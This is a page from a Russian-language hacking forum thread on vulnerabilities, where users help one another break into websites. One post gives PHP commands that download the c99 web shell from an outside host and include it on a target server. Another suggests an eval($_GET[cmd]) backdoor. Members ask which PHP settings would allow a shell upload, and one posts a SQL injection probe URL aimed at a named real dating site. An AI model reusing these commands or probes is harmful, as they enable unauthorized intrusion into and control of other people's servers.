ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #13341  
Старый 22.05.2010, 13:16
Аватар для GOGA075
GOGA075
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744

Репутация: 18
По умолчанию

Цитата:
Сообщение от DrakonHaSh  
: )))) да я смотрю ты реальный знаток : ))))
а еще я умею gif тоже исполнять и умею php делать текстом : ))))
зайти по ссылке дабы больше не лохаться так
Ну... я же по чужим ссылкам не хожу. И не знаю что там!!
Так что не надо выЁ!!
 
Ответить с цитированием

  #13342  
Старый 22.05.2010, 13:19
Аватар для CTAPu4OK
CTAPu4OK
Новичок
Регистрация: 28.10.2008
Сообщений: 14
Провел на форуме:
92208

Репутация: 6
По умолчанию

Цитата:
Сообщение от DrakonHaSh  
ты ищи возможности, а не недостатки - и тогда успех станет случаться намного чаще чем облом

CTAPu4OK
попробуй так

команда 1.
copy("http://madnet.name/files/download/9_c99madshell.php","/tmp/qwe.php");

команда 2.
include("/tmp/qwe.php");
Тоже не как =( выполняется без ошибок, но файла на сервере нет.

Через выполнение пхп и линукс команд я уже все что знал испробовал, переименовывал, перемещал, пытался записывать в уже имеющиеся файлы данные.

У меня уже был такой случай, вот точно такой же, так же фильтровались кавычки, и из за них я нечего не мог сделать, сам не справился, попросил знакомого что бы помог, он с легкостью залил шелл через sql inj, а как не говорит =(
 
Ответить с цитированием

  #13343  
Старый 22.05.2010, 13:32
Аватар для GOGA075
GOGA075
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744

Репутация: 18
По умолчанию

CTAPu4OK
eval($_GET[cmd]); пробовал?
 
Ответить с цитированием

  #13344  
Старый 22.05.2010, 13:44
Аватар для CTAPu4OK
CTAPu4OK
Новичок
Регистрация: 28.10.2008
Сообщений: 14
Провел на форуме:
92208

Репутация: 6
По умолчанию

Цитата:
Сообщение от GOGA075  
CTAPu4OK
eval($_GET[cmd]); пробовал?
Скрипт не пашет
Но это получится вот так
eval($_GET[cmd]);
exit;

т.е. если бы он и заработал, я все равно бы нечего не смог сделать) после каждого выполнения скрипта exit; закрывает работу со скриптом, а без exit; експлойт не пашет =(((

Я уже 2 дня над этим парюсь(
 
Ответить с цитированием

  #13345  
Старый 22.05.2010, 13:45
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

CTAPu4OK
Надеюсь ты сам понимаешь что хочешь?

Объясни по русски, что у тебя там имеется в наличии

1 Если есть исполнение кода и папки на запись, то почему ты не можешь залить шелл?
2 Если есть рутовый доступ в ПМА то о каких кавычках ты говоришь?

phpinfo() покажи тут. А именно диррективы
allow_url_fopen
allow_url_include
disable_functions
magic_quotes_gpc
open_basedir
safe_mode


И напиши что конкретно у тебя имеется. А то по твоим словам я не понимаю у тебя ПМА на том-же сервере, или на другом вообще.
 
Ответить с цитированием

  #13346  
Старый 22.05.2010, 13:56
Аватар для pinch
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530

Репутация: 54
По умолчанию

Цитата:
что-то нехватает фантазии раскрутить: http://www.datehunters.com/Personals/member_page.asp?AdsID=17125+and+1=1&SexID=4
там у вас Microsoft JET Database. следовательно запросы передаются на низком уровне.
 
Ответить с цитированием

  #13347  
Старый 22.05.2010, 14:14
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от pinch  
там у вас Microsoft JET Database. следовательно запросы передаются на низком уровне.
https://forum.antichat.ru/showpost.php?p=2149589&postcount=13265
https://forum.antichat.ru/showpost.php?p=2152999&postcount=13287

Ты уж ответь на вопрос, будь так добр
 
Ответить с цитированием

  #13348  
Старый 22.05.2010, 14:16
Аватар для Konqi
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

все вы про "вопросы на низком уровне"

что это такое?

во интересно,все любят говорит,а когда задаешь вопрос никого нету

Последний раз редактировалось Konqi; 22.05.2010 в 14:23..
 
Ответить с цитированием

  #13349  
Старый 22.05.2010, 14:22
Аватар для aka_zver
aka_zver
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
Провел на форуме:
3132379

Репутация: 1069


Отправить сообщение для aka_zver с помощью ICQ Отправить сообщение для aka_zver с помощью AIM Отправить сообщение для aka_zver с помощью MSN Отправить сообщение для aka_zver с помощью Yahoo
По умолчанию

Цитата:
Сообщение от Konqi  
все вы про "вопросы на низком уровне"

что это такое?
при ошибке "Microsoft VBScript runtime error '800a000d'" - фиг извлечёшь данные, это говоря об этом (типа "низкоуровневые запросы")

а в данном случае извлечь возможно

Цитата:
Вы его адвокат, молодой человек?
Причём тут это?
Или это означает по вашему, что в Accessе невозможна инъекция?
я адвокат только сам себе
немного не так выразился
в аксессе возможны инъекции

Последний раз редактировалось aka_zver; 22.05.2010 в 14:36..
 
Ответить с цитированием

  #13350  
Старый 22.05.2010, 14:26
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от aka_zver  
он имел в виду, что запросы передаются на уровне VB скриптов, при такой ошибке фиг извлечёшь данные
Вы его адвокат, молодой человек?
Причём тут это?
Или это означает по вашему, что в Accessе невозможна инъекция?

Последний раз редактировалось Jokester; 22.05.2010 в 14:31..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ